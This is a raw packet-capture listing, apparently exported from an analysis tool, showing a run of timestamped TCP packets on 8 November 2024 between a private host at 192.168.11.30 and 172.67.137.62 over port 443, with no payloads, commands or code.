                                                                                                                          Nov 8, 2024 10:59:45.556514025 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.557890892 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.557904005 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.558072090 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.558083057 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.558306932 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.558779955 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.558790922 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.559073925 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.559083939 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.559149027 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.560467958 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.560486078 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.560633898 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.560643911 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.560880899 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.561592102 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.561604977 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.561778069 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.562022924 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.562032938 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.563071012 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.563087940 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.563234091 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.563244104 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.563312054 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.563587904 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.564202070 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.564213991 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.564382076 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.564534903 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.564544916 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.565593004 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.565609932 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.565834999 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.565845013 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.565989971 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.566409111 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.566665888 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.566675901 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.566859007 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.744466066 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.744498014 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.744648933 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.744890928 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.744900942 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.745081902 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.745414972 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.745429039 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.745676994 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.745687008 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.745732069 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.745866060 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.746396065 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.746407986 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.746588945 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.746588945 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.746601105 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.746690989 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.746917009 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.747164965 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.747179031 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.747355938 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.747430086 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.747436047 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.747534990 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.747720957 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.748610973 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.748625994 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.748742104 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.748785973 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.748785973 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.748856068 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.748861074 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.748902082 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.749005079 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.749557972 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.749568939 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.749718904 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.749718904 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.749902010 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.749907017 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.751102924 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.751116991 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.751254082 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.751266003 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.751333952 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.751432896 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.752166033 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.752176046 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.752490997 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.752501011 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.752826929 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.752841949 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.752971888 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.752980947 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.753225088 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.754133940 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.754148006 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.754367113 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.754486084 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.754496098 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.755336046 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.755347013 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.755520105 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.755530119 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.755568027 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.755678892 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.756462097 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.756475925 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.756634951 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.756645918 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.756689072 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.756792068 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.757275105 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.757287025 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.757420063 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.757420063 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.757574081 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.757584095 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.758258104 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.758274078 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.758485079 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.758495092 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.758555889 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.759768009 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.759780884 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.759911060 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.759922028 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.760019064 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.760173082 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.760787964 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.760798931 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.760926962 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.761110067 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.761118889 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.761821032 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.761837959 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.762032986 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.762042999 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.762053967 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.762212992 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.762365103 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.762379885 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.762525082 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.762551069 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.762629986 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.762634039 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.764096975 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.764113903 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.764256954 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.764266968 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.764331102 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.764420986 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.765207052 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.765216112 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.765377045 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.765604019 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.765609026 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.765815973 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.765829086 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.766076088 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.766086102 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.766168118 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.767267942 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.767277956 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.767400026 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.767412901 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.767529964 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.767594099 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.768367052 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.768376112 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.768573046 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.768699884 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.768709898 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.769328117 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.769345045 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.769479036 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.769486904 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.769684076 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.769790888 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.770015001 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.770028114 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.770183086 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.770287037 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.770289898 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.771711111 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.771722078 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.771935940 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.771943092 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.772021055 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.772519112 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.772527933 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.772686958 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.772694111 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.772758007 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.772872925 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.773602009 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.773613930 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.773745060 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.773745060 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.773888111 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.773893118 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.773950100 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.774389982 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.774405003 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.774550915 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.774555922 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.774652958 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.774744034 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.775947094 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.775964975 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.776112080 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.776304007 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.776309013 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.777035952 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.777048111 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.777199030 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.777205944 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.777281046 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.777489901 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.777818918 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.777827024 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.777981043 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.777981043 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.778208971 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.778213978 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.778971910 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.778981924 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.779150963 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.779156923 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.779371977 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.780469894 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.780478001 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.780630112 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.780793905 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.780798912 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.781142950 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.781152964 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.781322002 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.781327963 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.781543970 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.782244921 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.782253981 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.782402039 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.782574892 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.782579899 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.782839060 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.782850981 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.783041000 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.783051014 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.783106089 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.784447908 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.784456015 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.784702063 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.784708977 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.784790039 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.785581112 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.785589933 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.785742044 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.785748959 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.785937071 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.786027908 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.786504984 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.786513090 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.786706924 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.786808014 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.786813974 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.787796974 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.787806988 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.787955999 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.787962914 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.788203955 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.789026976 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.789036036 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.789210081 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.789334059 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.789339066 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.789855003 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.789865971 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.790033102 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.790039062 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.790112019 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.790214062 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.790901899 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.790910006 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.791150093 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.791150093 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.791157007 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.791197062 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.791328907 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.792092085 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.792099953 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.792254925 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.792256117 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.792361021 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.792366028 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.792578936 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.793145895 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.793154001 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.793308020 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.793308020 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.793402910 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.793407917 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.793492079 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.794040918 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.794053078 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.794215918 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.794222116 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.794301033 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.794492960 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.795247078 CET44349754172.67.137.62192.168.11.30
